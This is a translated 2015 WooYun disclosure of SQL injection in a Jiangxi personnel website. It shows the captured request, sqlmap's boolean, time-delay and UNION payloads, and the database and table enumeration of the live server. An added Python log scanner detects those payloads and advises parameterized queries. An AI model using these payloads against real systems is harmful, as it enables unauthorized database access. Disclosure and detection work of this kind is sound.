
Vulnerability summary

Defect ID: wooyun-2015-0146518

Title: SQL injection in a provincial personnel examination website

Vendor: 江西人才网

Author: xunnun

Submitted: 2015-10-13 21:53

Fixed: 2015-11-30 14:36

Disclosed: 2015-11-30 14:36

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-10-13: Details sent to the vendor; awaiting vendor action
2015-10-16: Vendor confirmed; details visible to the vendor only
2015-10-26: Details disclosed to core white hats and relevant domain experts
2015-11-05: Details disclosed to regular white hats
2015-11-15: Details disclosed to intern white hats
2015-11-30: Details disclosed to the public

Brief description:

As the title says.

Details:

GET /bys/freeposlistmore_dxs.asp?pagesize=3&region=*&reqtxt=&tp=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: cacheid=E%3A%5Cwebroot%5Cjxrcw2008%5Ccachefile%5C20151012969%2Edbx; ASPSESSIONIDSADQRSDD=MNDGBIEBCDAIJOMFAOOOJNEO; once%5Fsea0=2015%2F10%2F12+11%3A38%3A34%5Bs%5Dduring%3D30%26; c%5Fcounts=0; once%5Fsea1=2015%2F10%2F12+11%3A38%3A39%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; dwid=; rcid=vid=b2b7ab2daf45bbf17f00b39b68c3dbf9&id=13480735; once%5Fsea2=2015%2F10%2F12+9%3A13%3A18%5Bs%5Dduring%3D30%26hr1%3D%2C362500%2C100000%26; ASP.NET_SessionId=ct5xohmgzk2aba555ozabg45; once%5Fsea3=2015%2F10%2F12+9%3A14%3A17%5Bs%5Dduring%3D1%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea4=2015%2F10%2F12+9%3A07%3A41%5Bs%5Dduring%3D30%26; once%5Fsea5=2015%2F10%2F12+9%3A14%3A54%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%26; once%5Fsea6=2015%2F10%2F12+9%3A07%3A53%5Bs%5Dduring%3D30%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea7=2015%2F10%2F12+9%3A07%3A59%5Bs%5Dduring%3D30%26; PHPSESSID=0f07c3754e2326b636e6bdd57f0f1cb3; once%5Fsea8=2015%2F10%2F12+11%3A38%3A31%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%E5%8E%A8%E5%B8%88%26; once%5Fsea9=2015%2F10%2F12+11%3A38%3A32%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; Hm_lvt_59597c781e785574f9f3b0ff29411bb0=1444620927,1444620934,1444620940,1444621125; Hm_lpvt_59597c781e785574f9f3b0ff29411bb0=1444621125; HMVT=59597c781e785574f9f3b0ff29411bb0|1444617322|; HMACCOUNT=A045F03F2DBCE2A0; bdshare_firstime=1444617386998; BAIDUID=530654A42E45A89ADE4A3F0A3C813510:FG=1; ASPSESSIONIDQADRSRCD=IAMPMGHBLPEGAJIAGDLGHDBC; a6859_pages=1; a6859_times=1; Hm_lvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lpvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; Hm_lpvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; ASPSESSIONIDQACTTSDC=BPCHFNCBKGPNGEAEOHAJFKCN; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; kf51_userid=1444618182085_8968; kf51_referrer=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; cck_lasttime=1444618182090; cck_count=0; jxrc_dw_autowidth=1; cnzz_a31557=0; sin31557=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; rtime=0; ltime=1444620194724; cnzz_eid=17005507-1304580828-http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%28; CNZZDATA31664=cnzz_eid%3D1282555937-1444615235-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1444615235
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


The region parameter of /bys/freeposlistmore_dxs.asp is injectable; the * in region=* in the request above is sqlmap's custom injection-point marker.

sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=%' AND 8995=8995 AND '%'='&reqtxt=&tp=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=%';WAITFOR DELAY '0:0:5'--&reqtxt=&tp=2
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=-9379%' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(97)+CHAR(69)+CHAR(109)+CHAR(119)+CHAR(66)+CHAR(117)+CHAR(118)+CHAR(113)+CHAR(81)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL-- &reqtxt=&tp=2
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] master
[*] model
[*] msdb
[*] newjxrc
[*] News
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: newjxrc
[10 tables]
+--------------+
| CD_INDU |
| PosViewTimes |
| RC_INFO |
| RESULT4DW |
| RESULT4RC |
| cd_educ |
| groupPos |
| indutj |
| postptj |
| wkregtj |
+--------------+


Database: master
[359 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| **.**.**.**puted_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.conversation_priorities |
| sys.credentials |
| sys.crypt_properties |
| sys.cryptographic_providers |
| sys.data_spaces |
| sys.database_audit_specification_details |
| sys.database_audit_specifications |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_audit_actions |
| sys.dm_audit_class_type_map |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_cdc_errors |
| sys.dm_cdc_log_scan_sessions |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_cryptographic_provider_properties |


Data can essentially be read without obstruction; stopping here.

Proof of vulnerability:

Remediation:

Copyright notice: please credit xunnun@乌云 when reposting.
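As an added defender-side example that is not part of the original report, the following Python script scans IIS W3C access-log lines for the three injection techniques sqlmap reported against the region parameter: a boolean tautology after a closing quote, a stacked WAITFOR DELAY, and a UNION SELECT. The log field order, the client address (a documentation range) and the log lines themselves are constructed for this example; the query strings are URL-encoded forms of the payloads shown above with the host removed.

```python
import re
from urllib.parse import parse_qs

# Field order assumed for the constructed IIS W3C log lines below; a real log
# declares its own order in a "#Fields:" directive, which this example skips.
FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

# One signature per technique sqlmap reported for the region parameter. They run
# against the URL-decoded parameter value, so encoding the quote as %27 in the
# raw query string does not hide the payload.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("stacked queries (WAITFOR DELAY)", re.compile(r";\s*waitfor\s+delay\s+'", re.I)),
    ("UNION query", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]


def parse_w3c_line(line):
    """Split one log line into a dict keyed by FIELDS; directives and malformed lines give None."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def find_injection_indicators(query):
    """Return (param, technique, decoded_value) for every parameter value matching a signature."""
    hits = []
    if query == "-":  # IIS writes "-" when the request carried no query string
        return hits
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            for technique, pattern in SIGNATURES:
                if pattern.search(value):
                    hits.append((param, technique, value))
                    break  # report the first matching technique per value
    return hits


def scan_log(lines):
    """Run the signatures over an iterable of log lines and return one finding per hit."""
    findings = []
    for line in lines:
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        for param, technique, value in find_injection_indicators(rec["cs-uri-query"]):
            findings.append({
                "time": f'{rec["date"]} {rec["time"]}',
                "client": rec["c-ip"],
                "path": rec["cs-uri-stem"],
                "param": param,
                "technique": technique,
                "value": value,
            })
    return findings


# Constructed sample log: one benign request followed by the three sqlmap payloads
# from the report, URL-encoded as IIS would record them. 203.0.113.0/24 is a
# documentation range, not a real client.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2015-10-12 11:38:34 203.0.113.7 GET /bys/freeposlistmore_dxs.asp "
    "pagesize=3&region=360100&reqtxt=&tp=2 200",
    "2015-10-12 11:40:02 203.0.113.7 GET /bys/freeposlistmore_dxs.asp "
    "pagesize=3&region=%25%27%20AND%208995%3D8995%20AND%20%27%25%27%3D%27&reqtxt=&tp=2 200",
    "2015-10-12 11:40:03 203.0.113.7 GET /bys/freeposlistmore_dxs.asp "
    "pagesize=3&region=%25%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&reqtxt=&tp=2 200",
    "2015-10-12 11:40:09 203.0.113.7 GET /bys/freeposlistmore_dxs.asp "
    "pagesize=3&region=-9379%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--&reqtxt=&tp=2 200",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["time"]} {f["client"]} {f["path"]} param={f["param"]} '
              f'technique={f["technique"]!r} value={f["value"]!r}')
```

Running the block prints one line per finding (three for the sample log, all on the region parameter). The signatures are deliberately narrow to the techniques the report shows and are a triage aid, not a substitute for the server-side fix: pass region to the query as a bound parameter (an ADODB.Command parameter in classic ASP) instead of concatenating it into the SQL text.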


Responses

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-10-16 14:34

Vendor reply:

CNVD confirmed and reproduced the described vulnerability; it has been forwarded through CNCERT to the corresponding branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet